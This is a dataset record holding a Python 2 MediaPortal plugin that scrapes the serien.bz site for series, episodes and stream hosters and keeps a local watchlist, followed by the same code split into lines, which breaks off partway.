org_text
stringlengths
830
329k
texts
sequence
scores
sequence
num_lines
int64
1
8.05k
avg_score
float64
0
0.27
check
bool
1 class
# -*- coding: utf-8 -*- from Plugins.Extensions.MediaPortal.plugin import _ from Plugins.Extensions.MediaPortal.resources.imports import * class SerienFirstScreen(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "ok" : self.keyOK, "0" : self.closeAll, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Genre:") self.genreliste = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.genreliste.append(("Serien A-Z","dump")) self.genreliste.append(("Watchlist","dump")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) self.keyLocked = False self.showInfos() def keyOK(self): Auswahl = self['liste'].getCurrent()[0][0] if Auswahl == "Serien A-Z": self.session.open(SerienLetterScreen) else: self.session.open(sbzWatchlistScreen) class SerienLetterScreen(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Genre Asuwahl") self['name'] = Label(_("Please wait...")) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] url = "http://serien.bz" getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError) def parseData(self, data): raw = re.findall('<a class="LetterMode " href="(.*?)">(.*?)<', data, re.S) if raw: self.filmliste = [] for (serienUrl, serienTitle) in raw: self.filmliste.append((decodeHtml(serienTitle), serienUrl)) self.ml.setList(map(self._defaultlistcenter, self.filmliste)) self.keyLocked = False self.showInfos() def showInfos(self): title = self['liste'].getCurrent()[0][0] self['name'].setText(title) def keyOK(self): if self.keyLocked: return serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] self.session.open(SerienSecondScreen, serienLink, serienName) class SerienSecondScreen(MPScreen, ThumbsHelper): def __init__(self, session, serienLink, serienName): self.serienLink = serienLink self.serienName = serienName self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) ThumbsHelper.__init__(self) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "5" : self.keyShowThumb, "ok" : self.keyOK, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft, "green" : self.addWatchlist }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Letter: %s" % self.serienName) self['name'] = Label(_("Please wait...")) self['F2'] = Label(_("Add to Watchlist")) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.page = 0 self.ImageUrl = "" self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] if self.serienName == "Top50": url = "http://serien.bz" else: url = self.serienLink getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError) def parseData(self, data): raw = re.findall('<li><a href="(.*?)".*?>(.*?)</a>', data, re.S) if raw: for (serienUrl, serienTitle) in raw: self.filmliste.append((decodeHtml(serienTitle), serienUrl)) self.ml.setList(map(self._defaultlistleft, self.filmliste)) self.keyLocked = False self.th_ThumbsQuery(self.filmliste, 0, 1, 1, None, '<p\sstyle="text-align:\scenter;"><a\shref="(.*?)"><img class', 1, 1) self.showInfos() def showInfos(self): serienUrl = self['liste'].getCurrent()[0][1] getPage(serienUrl, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.showInfos2).addErrback(self.dataError) def showInfos2(self, data): sbzCover = re.findall('<div class="entry">.*?<p.*?src="(.*?)".*?</p>.*?<p.*?</p>.*?<p.*?</p>', data, re.S) if sbzCover: self.ImageUrl = "http://serien.bz%s" % sbzCover[0] CoverHelper(self['coverArt']).getCover(self.ImageUrl) else: self.ImageUrl = "" serienTitle = self['liste'].getCurrent()[0][0] if re.match('.*?Sorry, but there.*?category yet.</h2>', data, re.S): self['handlung'].setText("Kein Stream vorhanden!") self['name'].setText("Kein Stream vorhanden!") else: self['name'].setText(decodeHtml(serienTitle)) sbzdescription = re.findall('<div class="entry">.*?<p.*?</p>.*?<p.*?</p>.*?<p style="text-align: left;">(.*?)</p>', data, re.S) self.handlung = sbzdescription if sbzdescription: self['handlung'].setText(decodeHtml(sbzdescription[0])) else: self['handlung'].setText(_("No information found.")) def addWatchlist(self): if self.keyLocked: return self.serienName = self['liste'].getCurrent()[0][0] self.serienLink = self['liste'].getCurrent()[0][1] print self.serienName, self.serienLink, self.ImageUrl, self.handlung if not fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "erstelle watchlist" open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","w").close() if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "schreibe watchlist", self.serienName, self.serienLink, self.ImageUrl, self.handlung writePlaylist = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","a") writePlaylist.write('"%s" "%s" "%s" "%s"\n' % (self.serienName, self.serienLink, self.ImageUrl, self.handlung)) writePlaylist.close() message = self.session.open(MessageBoxExt, _("%s was added to the watchlist." % self.serienName), MessageBoxExt.TYPE_INFO, timeout=3) def keyOK(self): if self.keyLocked: return serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] print serienName, serienLink self.session.open(SerienEpListingScreen, serienLink, serienName, self.ImageUrl) class SerienEpListingScreen(MPScreen): def __init__(self, session, serienLink, serienName, serienPic): self.serienLink = serienLink self.serienName = serienName self.serienPic = serienPic self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label(_("Episode Selection")) self['name'] = Label(self.serienName) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] url = self.serienLink CoverHelper(self['coverArt']).getCover(self.serienPic) getPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError) def parseData(self, data): streams_raw = re.findall('>Staffel:.(.*?)</th>(.*?)</table>', data, re.S) if streams_raw: for staffel,ep_raw in streams_raw: ep_raw2 = re.findall('<strong>Episode.(.*?)</strong>(.*?</p>)', ep_raw,) if ep_raw2: for episode,ep_rawData in ep_raw2: streams = re.findall('<strong>Stream:</strong> <a href="(.*?)".*?\| (.*?)<', ep_rawData, re.S) if streams: if int(staffel) < 10: s = "S0%s" % str(staffel) else: s = "S%s" % str(staffel) if int(episode) < 10: e = "E0%s" % str(episode) else: e = "E%s" % str(episode) title = "%s%s" % (s, e) self.filmliste.append((title, streams)) self.ml.setList(map(self._defaultlistleft, self.filmliste)) self.keyLocked = False def keyOK(self): serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] print serienName, serienLink self.session.open(SerienStreamListingScreen, serienLink, serienName, self.serienPic) class SerienStreamListingScreen(MPScreen): def __init__(self, session, serienLink, serienName, serienPic): self.serienLink = serienLink self.serienName = serienName self.serienPic = serienPic self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel }, -1) self['title'] = Label("Serien.bz") self['ContentTitle'] = Label(_("Stream Selection")) self['name'] = Label(self.serienName) self.keyLocked = True self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.filmliste = [] CoverHelper(self['coverArt']).getCover(self.serienPic) for hoster,hostrname in self.serienLink: if isSupportedHoster(hostrname, True): self.filmliste.append((hostrname, hoster)) if len(self.filmliste) == 0: self.filmliste.append((_('No supported streams found!'), None)) self.ml.setList(map(self._defaultlisthoster, self.filmliste)) self.keyLocked = False def keyOK(self): hostername = self['liste'].getCurrent()[0][0] hoster = self['liste'].getCurrent()[0][1] get_stream_link(self.session).check_link(hoster, self.playfile) def playfile(self, stream_url): if stream_url != None: self.session.open(SimplePlayer, [(self.serienName, stream_url, self.serienPic)], showPlaylist=False, ltype='serien.bz', cover=True) class sbzWatchlistScreen(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultListScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultListScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel, "up" : self.keyUp, "down" : self.keyDown, "right" : self.keyRight, "left" : self.keyLeft, "red" : self.delWatchListEntry }, -1) self.keyLocked = True self['title'] = Label("Serien.bz") self['ContentTitle'] = Label("Watchlist") self['F1'] = Label(_("Delete")) self.watchListe = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.loadPage) def loadPage(self): self.watchListe = [] if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "read watchlist" readStations = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","r") for rawData in readStations.readlines(): data = re.findall('"(.*?)" "(.*?)" "(.*?)" "(.*?)"', rawData, re.S) if data: (title, link, image, handlung) = data[0] print title, link, image self.watchListe.append((title, link, image, handlung)) print "Load Watchlist.." self.watchListe.sort() self.ml.setList(map(self._defaultlistleft, self.watchListe)) readStations.close() self.showInfos() self.keyLocked = False def showInfos(self): if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): print "read watchlist" readStations = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","r") for rawData in readStations.readlines(): data = re.findall('"(.*?)" "(.*?)" "(.*?)" "(.*?)"', rawData, re.S) if data: self.ImageUrl = self['liste'].getCurrent()[0][2] self.Handlung = self['liste'].getCurrent()[0][3] self['handlung'].setText(decodeHtml(self.Handlung)) CoverHelper(self['coverArt']).getCover(self.ImageUrl) else: self['handlung'].setText(_("No information found.")) picPath = "%s/skins/%s/images/no_coverArt.png" % (self.plugin_path, config.mediaportal.skin.value) CoverHelper(self['coverArt']).getCover(picPath) def delWatchListEntry(self): exist = self['liste'].getCurrent() if self.keyLocked or exist == None: return entryDeleted = False selectedName = self['liste'].getCurrent()[0][0] writeTmp = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist.tmp","w") if fileExists(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist"): readWatchlist = open(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist","r") for rawData in readWatchlist.readlines(): data = re.findall('"(.*?)" "(.*?)" "(.*?)" "(.*?)"', rawData, re.S) if data: (title, link, image, handlung) = data[0] if title != selectedName: writeTmp.write('"%s" "%s" "%s" "%s"\n' % (title, link, image, handlung)) else: if entryDeleted: writeTmp.write('"%s" "%s" "%s" "%s"\n' % (title, link, image, handlung)) else: entryDeleted = True readWatchlist.close() writeTmp.close() shutil.move(config.mediaportal.watchlistpath.value+"mp_sbz_watchlist.tmp", config.mediaportal.watchlistpath.value+"mp_sbz_watchlist") self.loadPage() def keyOK(self): exist = self['liste'].getCurrent() if self.keyLocked or exist == None: return serienName = self['liste'].getCurrent()[0][0] serienLink = self['liste'].getCurrent()[0][1] serienPic = self['liste'].getCurrent()[0][2] self.session.open(SerienEpListingScreen, serienLink, serienName, serienPic)
[ "# -*- coding: utf-8 -*-\n", "from Plugins.Extensions.MediaPortal.plugin import _\n", "from Plugins.Extensions.MediaPortal.resources.imports import *\n", "\n", "class SerienFirstScreen(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Genre:\")\n", "\n", "\t\tself.genreliste = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tself.genreliste.append((\"Serien A-Z\",\"dump\"))\n", "\t\tself.genreliste.append((\"Watchlist\",\"dump\"))\n", "\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\tself.keyLocked = False\n", "\t\tself.showInfos()\n", "\n", "\tdef keyOK(self):\n", "\t\tAuswahl = self['liste'].getCurrent()[0][0]\n", "\t\tif Auswahl == \"Serien A-Z\":\n", "\t\t\tself.session.open(SerienLetterScreen)\n", "\t\telse:\n", "\t\t\tself.session.open(sbzWatchlistScreen)\n", "\n", "class SerienLetterScreen(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultGenreScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultGenreScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\"\t: self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Genre Asuwahl\")\n", "\t\tself['name'] = Label(_(\"Please wait...\"))\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\turl = \"http://serien.bz\"\n", "\t\tgetPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)\n", "\n", "\tdef parseData(self, data):\n", "\t\traw = re.findall('<a class=\"LetterMode \" href=\"(.*?)\">(.*?)<', data, re.S)\n", "\t\tif raw:\n", "\t\t\tself.filmliste = []\n", "\t\t\tfor (serienUrl, serienTitle) in raw:\n", "\t\t\t\tself.filmliste.append((decodeHtml(serienTitle), serienUrl))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.filmliste))\n", "\t\t\tself.keyLocked = False\n", "\t\t\tself.showInfos()\n", "\n", "\tdef showInfos(self):\n", "\t\ttitle = self['liste'].getCurrent()[0][0]\n", "\t\tself['name'].setText(title)\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tself.session.open(SerienSecondScreen, serienLink, serienName)\n", "\n", "class SerienSecondScreen(MPScreen, ThumbsHelper):\n", "\n", "\tdef __init__(self, session, serienLink, serienName):\n", "\t\tself.serienLink = serienLink\n", "\t\tself.serienName = serienName\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\t\tThumbsHelper.__init__(self)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"5\" : self.keyShowThumb,\n", "\t\t\t\"ok\"\t: self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft,\n", "\t\t\t\"green\" : self.addWatchlist\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Letter: %s\" % self.serienName)\n", "\t\tself['name'] = Label(_(\"Please wait...\"))\n", "\t\tself['F2'] = Label(_(\"Add to Watchlist\"))\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\t\tself.page = 0\n", "\t\tself.ImageUrl = \"\"\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\tif self.serienName == \"Top50\":\n", "\t\t\turl = \"http://serien.bz\"\n", "\t\telse:\n", "\t\t\turl = self.serienLink\n", "\t\tgetPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)\n", "\n", "\tdef parseData(self, data):\n", "\t\traw = re.findall('<li><a href=\"(.*?)\".*?>(.*?)</a>', data, re.S)\n", "\t\tif raw:\n", "\t\t\tfor (serienUrl, serienTitle) in raw:\n", "\t\t\t\tself.filmliste.append((decodeHtml(serienTitle), serienUrl))\n", "\t\t\tself.ml.setList(map(self._defaultlistleft, self.filmliste))\n", "\t\t\tself.keyLocked = False\n", "\t\t\tself.th_ThumbsQuery(self.filmliste, 0, 1, 1, None, '<p\\sstyle=\"text-align:\\scenter;\"><a\\shref=\"(.*?)\"><img class', 1, 1)\n", "\t\t\tself.showInfos()\n", "\n", "\tdef showInfos(self):\n", "\t\tserienUrl = self['liste'].getCurrent()[0][1]\n", "\t\tgetPage(serienUrl, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.showInfos2).addErrback(self.dataError)\n", "\n", "\tdef showInfos2(self, data):\n", "\t\tsbzCover = re.findall('<div class=\"entry\">.*?<p.*?src=\"(.*?)\".*?</p>.*?<p.*?</p>.*?<p.*?</p>', data, re.S)\n", "\t\tif sbzCover:\n", "\t\t\tself.ImageUrl = \"http://serien.bz%s\" % sbzCover[0]\n", "\t\t\tCoverHelper(self['coverArt']).getCover(self.ImageUrl)\n", "\t\telse:\n", "\t\t\tself.ImageUrl = \"\"\n", "\t\tserienTitle = self['liste'].getCurrent()[0][0]\n", "\t\tif re.match('.*?Sorry, but there.*?category yet.</h2>', data, re.S):\n", "\t\t\tself['handlung'].setText(\"Kein Stream vorhanden!\")\n", "\t\t\tself['name'].setText(\"Kein Stream vorhanden!\")\n", "\t\telse:\n", "\t\t\tself['name'].setText(decodeHtml(serienTitle))\n", "\t\t\tsbzdescription = re.findall('<div class=\"entry\">.*?<p.*?</p>.*?<p.*?</p>.*?<p style=\"text-align: left;\">(.*?)</p>', data, re.S)\n", "\t\t\tself.handlung = sbzdescription\n", "\t\t\tif sbzdescription:\n", "\t\t\t\tself['handlung'].setText(decodeHtml(sbzdescription[0]))\n", "\t\t\telse:\n", "\t\t\t\tself['handlung'].setText(_(\"No information found.\"))\n", "\n", "\tdef addWatchlist(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\n", "\t\tself.serienName = self['liste'].getCurrent()[0][0]\n", "\t\tself.serienLink = self['liste'].getCurrent()[0][1]\n", "\n", "\t\tprint self.serienName, self.serienLink, self.ImageUrl, self.handlung\n", "\n", "\t\tif not fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"erstelle watchlist\"\n", "\t\t\topen(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"w\").close()\n", "\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"schreibe watchlist\", self.serienName, self.serienLink, self.ImageUrl, self.handlung\n", "\t\t\twritePlaylist = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"a\")\n", "\t\t\twritePlaylist.write('\"%s\" \"%s\" \"%s\" \"%s\"\\n' % (self.serienName, self.serienLink, self.ImageUrl, self.handlung))\n", "\t\t\twritePlaylist.close()\n", "\t\t\tmessage = self.session.open(MessageBoxExt, _(\"%s was added to the watchlist.\" % self.serienName), MessageBoxExt.TYPE_INFO, timeout=3)\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tprint serienName, serienLink\n", "\t\tself.session.open(SerienEpListingScreen, serienLink, serienName, self.ImageUrl)\n", "\n", "class SerienEpListingScreen(MPScreen):\n", "\n", "\tdef __init__(self, session, serienLink, serienName, serienPic):\n", "\t\tself.serienLink = serienLink\n", "\t\tself.serienName = serienName\n", "\t\tself.serienPic = serienPic\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(_(\"Episode Selection\"))\n", "\t\tself['name'] = Label(self.serienName)\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\turl = self.serienLink\n", "\t\tCoverHelper(self['coverArt']).getCover(self.serienPic)\n", "\t\tgetPage(url, headers={'Content-Type':'application/x-www-form-urlencoded'}).addCallback(self.parseData).addErrback(self.dataError)\n", "\n", "\tdef parseData(self, data):\n", "\t\tstreams_raw = re.findall('>Staffel:.(.*?)</th>(.*?)</table>', data, re.S)\n", "\t\tif streams_raw:\n", "\t\t\tfor staffel,ep_raw in streams_raw:\n", "\t\t\t\tep_raw2 = re.findall('<strong>Episode.(.*?)</strong>(.*?</p>)', ep_raw,)\n", "\t\t\t\tif ep_raw2:\n", "\t\t\t\t\tfor episode,ep_rawData in ep_raw2:\n", "\t\t\t\t\t\tstreams = re.findall('<strong>Stream:</strong> <a href=\"(.*?)\".*?\\| (.*?)<', ep_rawData, re.S)\n", "\t\t\t\t\t\tif streams:\n", "\t\t\t\t\t\t\tif int(staffel) < 10:\n", "\t\t\t\t\t\t\t\ts = \"S0%s\" % str(staffel)\n", "\t\t\t\t\t\t\telse:\n", "\t\t\t\t\t\t\t\ts = \"S%s\" % str(staffel)\n", "\n", "\t\t\t\t\t\t\tif int(episode) < 10:\n", "\t\t\t\t\t\t\t\te = \"E0%s\" % str(episode)\n", "\t\t\t\t\t\t\telse:\n", "\t\t\t\t\t\t\t\te = \"E%s\" % str(episode)\n", "\n", "\t\t\t\t\t\t\ttitle = \"%s%s\" % (s, e)\n", "\n", "\t\t\t\t\t\t\tself.filmliste.append((title, streams))\n", "\t\t\t\t\tself.ml.setList(map(self._defaultlistleft, self.filmliste))\n", "\t\t\t\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tprint serienName, serienLink\n", "\t\tself.session.open(SerienStreamListingScreen, serienLink, serienName, self.serienPic)\n", "\n", "class SerienStreamListingScreen(MPScreen):\n", "\n", "\tdef __init__(self, session, serienLink, serienName, serienPic):\n", "\t\tself.serienLink = serienLink\n", "\t\tself.serienName = serienName\n", "\t\tself.serienPic = serienPic\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(_(\"Stream Selection\"))\n", "\t\tself['name'] = Label(self.serienName)\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.filmliste = []\n", "\t\tCoverHelper(self['coverArt']).getCover(self.serienPic)\n", "\t\tfor hoster,hostrname in self.serienLink:\n", "\t\t\tif isSupportedHoster(hostrname, True):\n", "\t\t\t\tself.filmliste.append((hostrname, hoster))\n", "\t\tif len(self.filmliste) == 0:\n", "\t\t\tself.filmliste.append((_('No supported streams found!'), None))\n", "\t\tself.ml.setList(map(self._defaultlisthoster, self.filmliste))\n", "\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\thostername = self['liste'].getCurrent()[0][0]\n", "\t\thoster = self['liste'].getCurrent()[0][1]\n", "\t\tget_stream_link(self.session).check_link(hoster, self.playfile)\n", "\n", "\tdef playfile(self, stream_url):\n", 